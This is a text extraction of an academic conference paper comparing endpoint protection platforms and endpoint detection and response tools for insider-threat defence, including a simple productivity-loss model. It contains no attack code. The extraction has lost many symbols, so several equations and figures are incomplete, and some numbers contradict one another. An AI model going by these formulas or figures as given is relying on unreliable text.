Conference PaperPDF Available

Endpoint Protection: Measuring the Effectiveness of Remediation Technologies and Methodologies for Insider Threat

Authors:
Endpoint Protection
Measuring the effectiveness of remediation technologies and methodologies for
insider threat
Sonali Chandel, Sun Yu, Tang Yitian, Zhou Zhili, Huang Yusheng
College of Engineering and Computing Sciences, New York Institute of Technology, Nanjing, China
{schandel, ysun33, ytang11, zzhou23, yhuang66}@nyit.edu
Abstract - Wi th t he i
ncrease in the incidences of data leak
age,
enterprises have started to realize that the endpoi nts (especi ally
mobile devices) used by their employees are the primary cause
of data breach in most of the cases. Data shows that employee
training, whic h aims to prom ote the awareness of protecting the
sensitive data of the organization is
not very useful
. Besides,
popular third-party cloud services make it even more difficult
for employees to keep the secrets of their workplace safer. This
pressing issue has caused the emergence of a significant market
for various software products that provide endpoint data
protection for these organizations. Our study will discuss some
methods and technologies that deal with traditional, negative
endpoint protection: Endpoint protection platform (EPP), and
another new, positive endpoint protection: Endpoint detection
and response (EDR). The comparison and evaluation between
EPP and EDR in mechanism and effectiveness will also be shown.
The study also aims to analyze the merits, faults
, and
key
features that an excellent protection software should have. The
objective of this paper is to assist small-scale and big-scale
companies to improve their understanding of insider threats in
such rapidly developing cyberspace, which is full of potential
risks and attacks. This will also help the companies to have better
control over their employee’s endpoint to be able to avoid any
future data leaks. It will also help negligent users to comprehend
how serious is the problem that they are faced with, and how they
should be careful in handli ng their privacy when they are surf ing
the Internet while being connected to the company’s network.
This paper
aims to contribute to further research on endpoint
detection and protection or some similar topics by trying to
predict the future of protection products.
Keywords—Endpoint protection, Endpoint detection and
response, Endpoint protection platform, Data leakage, Privacy,
Insider threat, Data Breach
I. INTRODUCTION
Endpoint security or endpoint protection is an approach
to protect the computer networks that are remotely bridged to
client devices [1]. Many electronic devices we use, such as
mobile phones, laptops, and tablets, are all endpoints. The
connection of laptops, tablets, mobile phones, and other
wireless devices to corporate networks creates attack paths for
security threats [2]. No one wants to be disturbed or
eavesdropped when sending or receiving messages over the
network. As a result, endpoint security has become a hot topic
for researchers in the cybersecurity area.
Laptops and mobile phones have become an essential part
of our modern life. The owner of an enterprise must figure out
some features and standard methods of protecting the most
vulnerable endpoints. A phishing link in an e-mail can give
access to company secrets to the hacker, and a third party
cloudservice can quickly become the hacker’s target as well.
While many large organizations take a more
sophisticated approach towards endpoint security by using
different, specialized products for the tasks of prevention,
detection, and response, a growing trend in implementing a
single, all-in-one” solution enables centralized management
of multiple security functions instead [
3
]. Companies are
always looking for the software that contains all the tasks
mentioned above so that it could help them defend the threat.
For IT decision-makers, the present time is very crucial
for increased investment in stronger endpoint protection. Of
113 respondents in the 2018 Endpoint Security Spending
Priorities Survey, conducted by Barkly, advanced malware
protection and prevention was by far the highest priority for
most companies in 2018. [4]. According to 2018 Insider
Threat report, among the companies that were surveyed, at
least 27% agreed that the insider threat is causing much more
damage than ever before that too at a higher frequency. In the
same report, 53% of companies also reported that they had
experienced an insider attac
k more than once in the
last year
or so [5].
Insider threat is a generic term used for a threat to an
organization's security or data that comes mostly from within
the organization [6]. For many companies, the security of
information is the most significant. At the same time, insider
threatsare the biggest target for hackers. Because they are hard
to detect and can easily
be manipulated to breach the firewalls
in use. Many hackers target insiders to steal data or infiltrate
the system mostly through social engineering. In the recent
past, many companies have been targeted this way. An
example can be from Facebook, Sony, LinkedIn, and many
more prominent companies.
There are sever
al ways and tools to defend an
endpoint. In this paper, we will focus on two of them, namely,
the endpoint protection platform (EPP) and endpoint detection
and response (EDR). EPP is a platform that consists of
different security tools such as antivirus, anti-malware, data
encryption, personal firewalls, and intrusion prevention. EDR,
with its spe
cific function like continuous monitoring,
remediation, and no interference to the endpoint, has become
a popular way of detecting and responding accordingly when
it comes to insider threat.
In section I, the content of the article is briefly introduced.
In section II, the related work about insider threat is mentioned.
In section III, the essential features of the endpoint protection
platform are introduced.
In section IV,
the drawbacks of
endpoint protection platform are discussed. In section V,
endpoint detection and response are presented. Disadvantages
of endpoint protection platform are mentioned as well. In
section VI, effectiveness comparison between endpoint
protection platform and endpoint detection and response is
81
2019 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)
978-1-7281-2542-8/19/$31.00 ©2019 IEEE
DOI 10.1109/CyberC.2019.00023
made. We have proposed a model with the help of some
information that we obtained from test corporations and
conduced the formula of the effectiveness of different products.
In section VII, the conclusion is made, and future work is
discussed.
II. RELAT ED WORK
The insider threat has already been one of the biggest
problems in the field of cybersecurity in the present times.
Many tasks related to the insider threat has been done, and
many papers have presented several ways to detect the insider
threat by proposing different models and architecture. Many
experts have tried to identify the risks by introducing new
algorithms as well.
In [7], the author introduces a framework that uses
different modules to detect insider threat based on algorithms
and functional methods. One algorithm in [8] called GP also
achieved this function. Another mathematical method
discussed in [9] claims to help in managing the authorized
admins to detect the insider threat. Some even propose that we
could utilize a system-based architecture called directory
virtualization [10] to detect the insider threat
.
Machine
learning is another essential aspect of the modern internet, and
in [11], a detection method based on machine learning is
discussed.
In [12], the author presents a tool called user behavior
analytics and gives a clear architecture and design idea of this
software. Some white hat hackers even think about an idea that
could utilize “decoy file” [13
] to attract the insider threat’s
attention and then trap them. Different situations of insider
threat have been discussed in [14]. [15] discusses different
categories of detection tools. In [16], the author discusses the
“insider threat infiltrates database system” situation in detail
and briefly discusses how to handle the insider threat at an
early stage.
Most of these papers
mentioned
above focus on new methods
to detect the insider threat. It can genuinely contribute to the
development of the detection method. However, in articles [7]
[9] [8] [11] [12], they do not mention a mature product that
could help simple consumer and clients to defend the insider
threat. In [10] and [13], they have proposed practical methods
to handle insider threat, but they did not discuss the mature
production. Another flaw is that they are all a little outdated.
Insider threat mutates so quickly that the method they present
may no longer be useful.
Survey papers [14, 15, 16] is related to the topic of our article.
In [14], the author mainly discusses different scenarios of
insider threat attacks. However, it does not prove any solution
for that. In [15] and [16
], they have described some tools in
detail to defend the insider threat. However, they did not
mention their features and effectiveness or any comparison
between those tools. Our goal is to solve all these problems
mentioned above.
We have presented distinct and detailed information about
different types of threat detection and response technologies in
our paper. The reader can quickly and clearly understand the
functions
, feature
s, merits, and flaws of each one of them.
Besides, we have also presented a comparison between EPP
and EDR through gathering information and establishing a
model of our own. We have analyzed them under different
situations and factors and calculated the full effectiveness and
efficiency of them. Using our proposed model, we can obtain
the formula of efficiency ratio of two products, and we can
predict which one of them is more efficient under different
circumstances.
In the proposed model, we obtained
the
equation of efficiency ratio. Using Matlab, we drew graphsand
curves to visualize the change of efficiency trend with the
evolution of different factors. This will help our readers to
understand our research more efficiently.
III. A PASSIVE WAY TO DEFEND THREAT: FEATURES OF
ENDPOINT PROTECTION PLATFORM
Endpoint protection platform (EPP) is a traditional,
signature-based, negative endpoint protection software. The
primary mechanism it uses to protect the endpoint is to match
the signatures of threats already stored in the database to
determine if it is harmful or not. EPP is a set of software tools
and technologies that enables the security of endpoint devices
[17]. The main procedure of treating the threat of EPP is shown
in Figure 1. When the threat penetrates the firewall, the Host
Intrusion Detection System (HIDS) detects the threat and
determine whether it is malicious or not. The malicious ones
will be mitigated by Host Intrusion Protection System (HIPS).
The following sub-
section lists the main features of EPP.
Figure 1. Process of how EPP address threats
A. Detection
The most significant part of the endpoint is its detection.
EPP, like traditional antivirus software, has a complete
signature identity function. There are large amounts of the
database with the virus’ signature. This database can be used
to identify each kind of
already known
viruses. The matching
procedure is based on different algorithms. Each security
company has its algorithms to detect the threat.
As we know, EPP is a union of different software. The
mechanism used by most of them is intrusion detection.
Intrusion detection is a significant method of EPP. It is the
process of monitoring the events occurring in a computer
system or network and analyzing them for signs of intrusions
[4]. IDS can help users defend the attackers and complete the
procedure of intrusion detection. Signature-based detection is
just one of the detection methods used, but it is the most widely
used method. HIDS monitors and collects the characteristics
for hosts containing sensitive information and servers running
public services, and suspicious activities [18]. It is the most
82
common system when defending the intrusion.
B. Protect the infected system
Detection certainly is an essential part of endpoint
protection. However, no matter how prudent users are,
sometimes they still face a situation where viruses still infect
the system or the network through the endpoint. Organizations
must eliminate any possibility of any external invasion through
endpoint to keep their system secure. Protection function aims
to eliminate the virus that ha
s already been inside the system
as the source that may cause significant devastation to the
system. It is crucial because if the EPP system takes no action,
the viruses will infect the whole system. It supplies a solution
to remedy mistakes. EPP uses another algorithm for HIPS.
HIPS must work with HIDS. However, a very significant
difference
between
HIDS and HIPS is that HIPS will
annihilate threats that have been identified as a malicious
resource of HIDS. A HIPS has a mechanism of automatically
mitigating the detected risk [19].
C. Whitelist and Blacklist
Whitelist/Blacklist function is another vital function that
EPP provides. “Blacklist and Whitelist” is treated as one of the
significant
solutions for endpoint security. EPP has its
database about viruses. It will automatically blacklist or block
software or files that are considered malicious. With the help
of whitelist, users can still get access to the software or data as
a whitelisted application or software is marked safe for the
system or network.
IV. WHY IS THE ENDPOINT PROTECTION PLATFORM NOT
FULL PROOF?
With enormous merits, EPP is treated as a perfect guardia
n
of the endpoint. However, EPP begins to show its flaws faster
when confronted with advanced hacking methods. EPP uses a
massive database for virus signatures, and as a result, the
matching process creates much wastage of resources.
Sometimes the virus signatures cannot be matched on time
because viruses mutate very fast. However, the most
significant flaw of EPP is that it cannot defend insider threats,
which have become one of the most popular methods of
hacking these days. Some weaknesses of EPP are listed in the
following sub-section:
A. A matching signature needs too many resources
A considerable number of viruses are developed every day.
An antivirus must record all the signatures of viruses to grant
the security of endpoint. This
also means that the database of
signature is so extensive that users must spend much money
on creating storage to install this database. Users also have to
invoke a significant number of resources on their devices when
they wish to scan their device to be able to use the antivirus. It
is an advantage that these large numbers of threats can be
detected and dealt with. However, it also means that it can take
a considerable amount of resources to run through each of
these signatures and match them against a scannable resource
(like files, network traffic, etc.) [19]. ‘Cloud scan’ is a kind of
method to solve the problem of resources. In this method, the
organization invokes a database of signatures from cloud to
match files’ signature on the local computer. Many third-party
companies provide this service, and users can quickly notice
that the running efficiency of their devices reduces very
sharply when it is under attack.
B. The proportion of fileless attacks is on the rise
Viruses are mutable. Hackers will develop a new virus by
transforming the existing features and changing the known
signature to avoid detection from EPP. Creating a virus with a
unique signature is a child’s play now. Thanks to the nearly
automated virus construction kits that have filled the internet
over the past several years [20]. Ponemon’s Institutes State of
Endpoint Security Risk Report for 2018 exposed that 54% of
organizations admitted becoming a victim of a successful
fileless or file-based attacks. Of all the organizations
compromised, 77% were attacked by the fileless techniques.
The report also i
ndicat
ed that fileless attacks are ten times
more likely to succeed than traditional, file-based methods. [1]
Fileless attack techniques that exploit a fundamental gap in
the traditional endpoint security are on the rise. Current
solutions are not able to stop them [21]. If HIDS cannot match
the signature, the HIPS will not work, which
in turn
will cause
the protection system to crash completely. HIDS typically runs
on the operating system. This means it can be easily
compromised by malicious insiders or malware [25]. Figure 2
shows that the frequency of fileless attack is growing more
rapidly than ever [21].
Fi
gure
2. The growth of fileless and file-based attacks from 2016 -2018
C. Many functions require internet
‘Cloud scan’ can be a solution to avoid the occupancy of
too many resources while scanning the signature of the known
threats. However, using a cloud scan needs being connected to
the cloud server and keep the device or system connected to
the network all the time. For
example, Data Loss Prevention
(DLP) is an essential component of EPP. DLP is a strategy for
making sure that end users do not send sensitive or critical
information outside the corporate network [22]. However, to
make DLP work, typically the EPP must connect to the internet,
or it will not work. Not only for cloud scan, but users must also
connect to the server of the security company as this is the only
way user can get the latest updated data, security patches, and
information regarding recent threats.
In some cases, if one endpoint has already been infected, then
the virus will spread into the system and the network very fast.
This can happen even if an employee connects the infected
device to the corporate network unintentionally. Therefore, the
employees need to be very careful when connecting to the
corporate network. Sometimes, EPP cannot detect this kind of
83
threats, and as a result, cannot eliminate it either. Such type of
situations can lead to a massive loss for the company.
D. Insider threats can cause more damage than external
threats
Many different reasons can lead to data leakage. However,
the main reasons for information leakage can be divided into
two categories: accidental exposure and malicious exposure
[23
].
xAccidental exposure: Accidental exposure sources from
negligent actions taken by the employees such as poor
password security, unauthorized download of infected
software and applications without the IT department’s
knowledge or permission [23]. A phishing e-mail is
another widespread factor that leads to the
insider threat.
Most insider threat is the employee of a company. They
are manipulated by hackers to get the data they want. The
insider threat is powerful than any external attack because
an employee can provide easy access to the company’s
system. The only solution is to educate and train the
employees and improve their awareness of data privacy
and security [6].
xMalicious exposure: Malicious exposure is another
situation that is very common when it comes to data theft.
It sources from the criminal motive such as a competing
company or revenge from a former employee who intends
to destroy the whole system of a company or at the least
the part where they have the access. They can achieve it
by releasing malicious software in the company’s network
or system. However, this behavior can be easily
eliminated with the help of defending tools like EPP.
Figure 3 [5] shows that there is a considerable increase in
hacking through endpoints to get access to a corporation’s
confidential and commercial secrets. Hackers’ attackshave
made the situation of endpoint security more severe than ever
before. Besides stealing the sensitive data, the target of these
attack varies from stealing financial information to operational
data,
as these data are top secret. The leakage of these data will
cause severe data loss to a company as it makes them lose their
clients’ or employee’s data. Therefore, enterprises need to be
vigilant of insider threats [2]. The complete procedure of how
insider threat separates and infects the entire system is shown
in figures 4, 5, 6, and 7. Many attackers begin to utilize new
kinds of threat with no known signature to avoid antivirus and
EPP’s detection. In such cases, the EDR becomes another
solution to protect the endpoint.
V. SOLVING MOST DRAWBACKS OF EPP: FEATURES OF
ENDPOINT DETECTION AND RESPONSE
Passively waiting for traditional security countermeasures
to detect attacks is not enough. Proactive threat hunting, led by
human security experts, is a requirement for any organization
looking to achieve or improve real
-time threat detection and
incident response [24]. Endpoint detection and response (EDR)
system is an advanced, positive endpoint protection software.
Threat intelligence is an essential feature of EDR. Also, it can
supply anomaly detection and alert, remediation of the internal
network that has been infected. Also, they can utilize machine
learning to predict and avoid the threat. Main features of EDR
are listed in the following sub-section:
Figure 3. Different data sources under hacker ’s radar
Figure 4. One trusted endpoint is infected
Figure 5. The virus infects the server through an internal network.
Figure
6. Whole internal network and endpoint are infected
84
Figure 7. The process of insider threat infecting the entire internal network
A. Threat intelligence
Threat intelligence, also known as Cyber Threat
Intelligence (CTI), is organized, analyzed, and refined
information about potential or current attacks that threaten an
organization [25]. Avoiding risk is much safer and more
reliable than putting the available data and network under risk
and then trying to fix it. EDR is not only a protection software,
but its threat intelligence function allows it to warn corporates
about the potential risks and threats. It can provide some
information about the threat, which is collected by the server
of EDR. This kind of intelligence will facilitate the elimination
of the insider threat by analyzing the information and data
about the insider threats that happened in the past rather than
predicting the latent risk.
B. Continuous monitoring
The only way to detect abnormal endpoint behavior is
enhancing its control. If one endpoint is infected, EDR will
detect the unusual activity of that particular endpoint
immediately and isolate it instantaneously. They can supervise
endpoints dynamically, which means they shall test endpoint
incessantl
y and automatically. Furthermore, it can supply CPU
protection that can defend the kernel of the server. More
sophisticated behavior-based protection will include visibility
into activities at lower levels of the system, including CPU.
Visibility into CPU-level is active for blocking malware that
attempts to manipulate and make changes in memory,
including many exploits [26]. Powerful EDR tools enable easy
access to this data, providing immediate visibility to any area
of the organization. Consistent monitoring makes it impossible
for the threat from spreading through the endpoint [27].
C. Remediation and cleanup
Once abnormal endpoints are cleaned up, the escalation of
the virus stops. One may think that the whole system is clean
and safe. However, the presence of the advanced virus can act
as an ink drop into pure water. It will diffuse to the other part
to infect the internal network very fast.
Moreover, every residue of that can generate virus again.
This is one of the biggest drawbacks of EPP as it cannot deal
with the complete internal network but only a part of the
endpoint. EDR can scan all the internal networks to guarantee
there are no residues of the virus. They can also repair the
damages caused by viruses to maintain the security of the
internal system.
D. Observe without interference
“No one wants to burden the endpoint with heavy client
software anymore: that was one of the antiviruses biggest
drawbacks.” [27]. As one of the security researchers from the
Office of Information Technology said, antivirus needs to be
installed in the user’s devices, which waste s many resources
of the endpoint. However, when it comes to EDR, it can just
execute in the kernel of the network with its endpoint detection
component. For example, a network manager can install EDR
in the company’s server instead of every device of the
employee. This will protect the entire internal network of the
organization.
E. Using machine learning to detect unknown threats
Machine learning is a subset of artificial intelligence in the
field of computer science that often uses statistical techniques
to give computers the ability to "learn" with data, without
being explicitly programmed [28]. By using machine learning,
EDR also becomes a “clever platform, which is its another
advantage compared to EPP. Predictive models use
sophisticated analytical techniques, such as deep learning, to
understand the characteristics of malware and “predict” the
likelihood of malware from unknown applications. This
enables them to block never-before-seen attacks with a high
degree of certainty [26]. Machine learning can improve the
ability to identify the threats that they have never encountered
before. In such conditions where threats are mutable, this
ability may become the most significant merits of EDR and the
reason why most companies prefer to use it now
.
F. Highly customizable
Another feature of the EDR product is that it can adjust
itself to suit a company’s environment. Every company has its
unique distinguishing environment. Scanning from the root or
a folder? Are essential files stored in disk C or D? Mitigating
false positives? These functions require machine learning and
AI ability, which exactly are the most significant advantages
of EDR. “Sophisticated endpoint protection providers can take
the burden off of the admin by developing protection models
that are automatically tailored for each organization by using
machine learning to analyze the organization’s unique
software profile[34].
Through machine learning, EDR can filter a standard
software from a
malware, know which part it should focus on
when scanning, refine its’ effectiveness as time goes by, save
more resources than an unfit, unintelligent EDR production.
Because of these advantages, EDR has become very popular
in many organizations. Many organizations are replacing EPP
with EDR to protect their network system. However, EDR is
not a panacea. Some of EDR’s drawbacks still puzzle the
companies. Very high false-positive rates and the requirement
of highly trained operators are two of the most significant
flaws of EDR.
How to mitigate the high false-positive rates is a crucial
feature to estimate the effectiveness of an EDR product. High
frequency of false positives will lower the productivity of an
organization. “Some endpoint protection models force a trade-
off between the strength of protection and false positives - they
85
take a heavy-handed approach that blocks malware but also
flags much legitimate software in the process” [30]. An EDR
production with strict protection mechanism can certainly
block most of the threats, but sometimes they will treat normal
software as malware as well. In such situations, it
will cause
much trouble, such as not allowing access to a normal file in
the way it is usually done.
EDR is an advanced technology to deal with cyber and
network threats. The more advanced it is, the more the
requirement for the operators who run it. The company would
need to hire a highly trained operator to control the entire EDR
system, which ultimately increases the cost to the company.
Surely, it is not a very big problem for
a large company but
some medium or small-sized companies it becomes a
significant concern, as they must consider the increasing cost
concerning their information security. [31]
Table.1 concludes the summary of the main features of EPP
and EDR mentioned above.
Table.1. C
omparison between
EPP and EDR
EPP
Rationale
Unification of different
passive functions
Functions
Databases of virus’
signature
HIDS and HIPS
Blacklist & White list
Drawbacks
A matching signature
needs too many
resources.
Detection of v
irus
signature is outdated
The requirement of high
trained operators
Cannot defend insider
threats
Many functions
require internet
VI. WHICH IS BETTER: EPP OR EDR?
After the fundamental conception of two products, we will
propose a model to compare the effectiveness of both.
A. The EPP Model
First, we built a model for EPP. We know that EPP is a
passive defender and uses virus signature matching to detect
threats. Moreover, as we mentioned in section IV earlier, two
disadvantages stand out:
xIt will reduce the efficiency of the system because it takes
too many resources, which means it will lower the
productivity of a company
xSignature-
based detection will
lead to false positives
According to the statistical data from AV-TEST company
[32], we found that the average efficiency reduced by running
EPP is 12.5%. In addition, according to statistical data from
AV-C company [33], we found that the average protection rate
is 99.3%, and the average false-positive rate is 
. With the
help of these data, we can divide EPP into two states:
xProtectionEPP detects the threat and report
successfully.
xCompromiseEPP does not detect threats and allow
them to invade the system successfully.
Protection states could be further divided into two situations:
xTrue reportthreats truly invade, EPP detects it and
reports.
xFalse-positivethere is no actual threat invasion, but EPP
mistakes it for threat invasion and reports.
We assume R as the rate for EPP to get into protection states.
We know that R is 99.3% from statistical data collected by
AV-C company [33], so the formula could be represented as
follows:
(99.3%)  2983
3000
  17
3000
(0.07%)(1)
Because we have to take the performance of the computer
into account, we assume that
xy is the lost productivity of one company
x is the work efficiency of one company.
x is the time that is needed to eliminate the threat.
x is the working hours.
According to an eight-hour workday system implemented
by many companies, we assume
is equal to eight hours.
Therefore, the formula of the true report is:
y =12.5% (2)
Considering the states of EPP and according to equation (1),
multiplying the probability of protection by the probability of
true report, we can obtain the probability of true report as
99.3%×

Considering the false positives state. The formula for false
positive is: y=12.5%(−)(
3)
where is the time that cannot be put to work because of
false positives. According to the services of some EPP
company, they need 1-2 working days to solve the false
positives. Therefore, it can be treated in 8-16 hours.
Considering the state of EPP and according to equation (1),
multiplying the probability of protection by the probability of
false positive. We can obtain the probability of false-positive
as 99.3%× 
.
When it comes to the worst situation, which is a
compromised situation: y=(4)
Since the probability of protection is R, and EPP has only
two states: protection and compromise, we get the probability
86
of compromise as 1-R, where R is 99.3%. Therefore, the rate
of compromise states happens at 0.07%.
Then we calculate the weighted average of all the three cases,
and finally get the average productivity loss, which is as
follows: y=0.1240.007
+0.0007(5)
Using equation (5), we used Matlab to draw the trend
map. In figure 8, we find that the intercept of Y-coordinate
(loss) is 2, and the value of Y increases slightly with the
increase of X. The reason for the trend on this chart is that the
probability of compromise is very low. So, even if (time
that is needed to eliminate the threat) changes a lot, it will not
have such a big impact on the company's economic losses.
The reason why Y interception starts from 2 is that running
EPP will cause the system to run slowly, which will lead to a
decrease in productivity.
Figure 8. The trend of EPP loss (is 8h, is 24h, is 1)
B. The EDR model
We know that the EDR system defends a threat very
actively. The basic concept of EDR is that it can gain some
threat intelligence to help users predict the potential threat and
then protect it in advance.
W
e assume R as the possibility
of EDR to get into
protection statesThe value domain for R should be [0, 1] as
it is a possibility. We design a specific parameter () for
EDR. () is the function of R, which represents the
reduction as a proportion of the invasive time of the threat.
For example, when a virus invades and causes system
paralysis (a state where the machines cannot work) for 1 hour,
EDR can reduce the severity of virus invasions by collecting
intelligence, thus reducing the severity of paralysis events.
When ()=
, the virus can only paralyze the system
for half an hour. R is inversely proportional to (), but both
of them are smaller than 1. The higher the probability of R,
the more information it has. Which means, the shorter the time
of system paralysis. Therefore, the formula of EDR is:
y=()(6)
Then we calculate the weighted average of the two cases and
finally get the average productivity loss as:
y=R∙()
(7)
While taking the actual state of most EDR products, we
decide to change the domain of R to [0.5, 1]. As most EDR
productions defense rate is higher than 95%, so, it means that
R should not be between 0 and 0.5. In our model, we assume
()=1−
. Based on the above assumption, we get
figure 9.
Figure 9. The trend of EPP loss (is 8h, and is 1)
As shown in Figure 9, with the increase in R, the loss of the
company reduces dramatically. When R reaches 1, and Loss
reaches to 0, all the viruses
are defended.
After taking values of multiple times in MATLAB and
experimenting, we found that, if the parameters are too large
or too small, the trend will fluctuate in either a very large or a
minimal range, and =10 is the most reasonable value,
which can make the image show its trend in a reasonable
range.
So,
in this graph, we assume = 10h as the average
time for most EDR products to clean up the invasive viruses.
However, we know that varies from one virus to virus, so
we decided to take this unknown value into account and draw
a 3D figure. In figure 10, we can see that with the increase of
R and
, the loss of the company will increase, which fits
the real situation and verify the effectiveness of our model.
Figure 10. The trend of EDR loss (is 8h, and is 1)
87
C. Comparison of EPP and EDR
After obtaining the data and figures for EDR and EPP, we
combined them into one figure and compared their efficiency.
In figure 11, we can see that there is an intersected
boundary between EPP and EDR. Through solving the
simultaneous equations of function (5
) and function (
7). We
got that the equation of boundary is as follows:
=0.8240
()0.0007 (8)
Figure 11. The combined trend of EPP and EDR loss (is 8h, is 24h and
is 1, the red plane is ED R, and th e blue plane is EPP)
Therefore, at the left of this boundary, the blue plane is
above the red plane, which means that the loss in EPP is
higher than the EDR. This is an exceptional situation that the
success rate R, of EDR, is high, and the paralysis time caused
by threat is short
. S
o, the best choice under such
circumstances is EDR, and the prerequisite is:
<0.8240
()0.0007 (9)
When it comes to the right of the boundary, the red plane is
higher, and the best choice, in that case, is EPP. The
prerequisite is:
>0.8240
()0.0007 (10)
EDR, once compromised, will be paralyzed for a long time.
Therefore, the increase in the rate of this plane is significant.
Once defense succeeds, it does not have to bear the cost of
slowing down the system. Thus, the loss of productivity could
be as low as zero. EPP is the opposite; it pays the price but
runs stable, and it will not be influenced by threat dramatically.
VII. CONCLUSION AND FUTURE WORK
We have several methods to defend insider threat. However,
the most popular way that is being widely accepted is EPP and
EDR. We found that they have different effects in different
situations. EPP is good at dealing
with external threats. EPP
can effectively protect endpoints through its component
function such as HIDS, HIPS, and antiviruses. It can detect and
eliminate risks outside the system itself. There are certainly
some disadvantages of EPP as well, which includes
overutilization of resources, signature-based detection
methods, and requirement of the internet as a must to run many
functions. However, the most important and the most
significant threat is that it cannot defend the insider threat.
When a virus infiltrates into the internal network, EPP is not
the right solution anymore.
On the contrary, EDR can do what EPP cannot do. EDR is
an expert in dealing with the insider threat. It can gather
different information; develop its intelligence to help detect
the abnormal endpoints to eliminate insider threats. It also
overcomes some disadvanta ges that EPP has, such as
occupying too many resources. However, it cannot do what
EPP can do too. A primary problem of EDR is that it cannot
prevent the endpoints from being infected. In other words, it
cannot handle external threats very well, and it cannot monitor
what happens to one specific endpoint. Prevention always goes
beyond remediation. In some difficult situations, when a virus
can infect an endpoint countless times, the EDR is not the right
solution at all.
In our proposed models, we find that the loss caused by
EPP will be the least, and the loss will not i
ncrease according
to the increase of threat severity. The reason is that the high
detection rate makes most threats unable to penetrate the
computer in depth. However, since EPP can reduce the speed
of system operation, once opened, it has to incur a small loss.
However, even so, these losses are perfectly acceptable
compared to the enormous damages threatened by the
intrusion.
Secondly, in the EDR model, we notice
d that EDR is the
only product that may not lead to a loss but can completely
defend against the threat. However, it all depends on the
efficiency of EDR products. There are a few cleaning
mechanisms. So, once the active prediction fails, threat
intrudes into the system, which will cause severe loss to the
whole system. So, we suggest that we should consider the pros
and cons carefully when choosing EDR products.
Thirdly, which one to choose between EPP and EDR?
From our final formula, we can see that the effectiveness
comparison between EPP and EDR involves two influencing
factors, which are the time that is needed to eliminate the
threat () and the probability the EDR can actively predict
(R).
We suggest that priority should be given to the accuracy
of active defense of EDR if its accuracy can approach 1, or the
time needed to clear the virus is very short, which will not
cause significant loss to the enterprise, and the efficiency of
EDR will be higher than that of EPP. In other cases, EPP is
more efficient than EDR.
However, to analyze the actual effectiveness of EPP and
EDR, we had to put many factors into consideration. The
success rate of EDR is a crucial element to consider whether
to use
this produc
t or not. When the success rate is high, and
the paralysis time caused by the risk is low, it is better to use
EDR. However, if anything is different and either of the two
conditions is contrary, it is better to choose EPP. Most EDR
providers can guarantee high success detection and defense
probability, and the company must defend the threat. We
strongly suggest that both products should be taken into
consideration to ensure the safety and security of a company.
88
In this paper, we introduced some concepts of EPP and EDR
and established a model for both of them, but there are many
challenges and flaws that we could not address because of the
limitations of the time, data and resources. However, as we
know, threats and anti-threat methods are developing rapidly,
so the following needs to be done in the future:
xAll the contents mentioned in this paper need to be
updated and supplemented in time.
xWe also did some tests and data to verify the accuracy and
deviation of our model. There are still many factors that
should be taken into consideration in future tests.
xWe can improve our model and help some scholars to
strengthen their theory as well if some company can
release
more data about their production.
REFERENCE
[1] Margaret Rouse. “Endpoint security management”, Availab le: end
point security management [Accessed: September .16,2018]
[2] TechTarget, “Endpoint security management.” Available: http s://se
archsecurity.techtarget.com/definition/endpoint-security-management
[Accessed: March .11,2018]
[3] The Barkly team, “Endpoint Protection for the Mid-Market:3 Trends
Driving Big Changes”, Availab le: https://blog.barkly.com/endpoint-
protection-trends-2018-mid-market [Accessed: July .15,2018]
[4] Barkly. “Endpoint Protection wa
s the #1 spending priority in 2018
”,
pp1-2, 2018.
[5] Cybersecurity insiders. “2018 Insider threat report”, Available: htt
ps://www.cybersecurity -insiders.com/port folio/insider-threat-report/ [
Accessed: March .11,2018]
[6] L. Xiangyu, L. Qiuyang, and S. Chandel, "Social Engineering and
Insider Threats," 2017 International Conference on Cyber-Enabled
Distributed Compu ting and Knowledge Discovery (CyberC), Nanjing,
2017, pp. 25-34. Copyright © 2017, IEEE
[7] Zhang, Hongbin, et al. "An Active Defense Model and Framework of
Insider Threats Detection and Sense." International Con ference on
Information Assurance & Security IEEE Computer Society, 2009:258-
261.
[8] Due to C. Le, Sara Khanchi, A. Nur Zincir-Heywood, Malcolm
I. Heywood, "Benchmarking evolutionary computation approaches to
insider threat detection, “Proceedings of the Genetic and Evolutionary
Computation Conference, Kyoto, Japan,2018, pp.1286-1293
[9] Yuqing Sun, Ninghui Li, Elisa Bertino, “Proactive defense of insider
threats through authorization management, “Proceedings of 2011
international workshop on Ubiquitous affective awareness and
intelligent inte raction, Beijing , China,2011, pp.9-16
[10]
William R. Claycomb, Dongwan Shin, “Detecti
ng insider activity using
enhanced directory virtualization, “Proceedings of the 2010 ACM
workshop on Insider threats, Chicago, Illinois, USA,2010, pp.29-36
[11] Tabish Rashid, Ioannis Agrafiotis, Jason R.C. Nurse, “A New Take on
Detecting Insider Threats: Exploring the Use of Hidden Markov
Models, “Proceedings of the 8th ACM CCS International Workshop on
Managing Insider Security Threats, Vienna, Austria,2016, pp.47-56
[12] Tabish Rashid, Ioannis Agrafiotis, Jason R.C. Nurse, “A New Take on
Detecting Insider Threats: Exploring the Use of Hidden Markov
Models, “Proceedings of the 8th ACM CCS International Workshop on
Managing Insider Security Threats, Vienna, Austria,2016, pp.47-56
[13] Jonathan Voris, Jill Jermyn, Nathaniel Boggs, Salvatore Stolfo,
"Fox in the trap: thwarting masqueraders via automated decoy
document deployment, “Proceedings of the Eighth European Workshop
on System Security, Bordeaux, France,2015, Article No. 3
[14] Kenneth BrancikGabriel Ghinita"The optimization of si tuation
al awareness for insider threat d etection, "Proceedings of the Firs
t ACM Conference on Data and application security and privacy,
San Antonio, TX, USA,2011, pp.231-236
[15] Ameya Sanzgiri, Dipankar Dasgupta, "Classification of Insider
Threat Detection Techniques, “Proceedings of the 11th
Annual Cyber
and Information Security Research Conference, Oak Ridge, TN,
USA,2016, Article No. 25
[16] Elisa Bertino, Gabriel Ghinita, “Towards mechanisms for detectio
n and prevention of data exfiltration by insiders: keynote talk pa
per, “Proceedings of the 6th ACM Symposium on Information,
Computer and Communications Security, Hong Kong, China,2011
, pp.10-19
[17] Techopedia,
“Endpoint Protection Platform”, Available: https://ww
w.techopedia.com/definition/30918/endpoint-protection-platform-epp
[Accessed: March .11,2018]
[18] Liao, Hung Jen, et al. "Intrusion detection system: A comprehensive
review." Journal of Network & Computer Applications 36.1(2013):16-
24.
[19] Sean Wilkins, “A Guide to Choosing an Endpoint Protection Sol
ution,” Available: http://www.tomsitpro.com/articles/endpoint-
protec
tion-solutions,2-820.html [Accessed: March .11,2018]
